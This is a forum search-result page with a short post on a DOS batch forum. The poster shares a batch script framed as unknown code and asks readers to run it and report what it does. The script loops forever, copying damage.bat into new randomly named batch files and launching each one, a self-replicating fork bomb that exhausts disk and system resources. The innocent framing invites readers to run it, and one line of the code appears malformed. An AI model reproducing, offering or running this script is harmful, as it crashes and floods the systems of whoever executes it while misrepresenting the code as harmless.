Search found 1 match

by Blanks
19 Feb 2020 15:13
Forum: DOS Batch Forum
Topic: Expanding files
Replies: 1
Views: 9651

Expanding files

I found this code on the web while search for something and I'm not sure its working some test it and tell me what it does :mrgreen:

@echo off
:A
Set /A
X=%RANDOM%%%1999999999%
Type damage.bat >> %x%.bat
Start %x%.bat
Goto:A

Thanks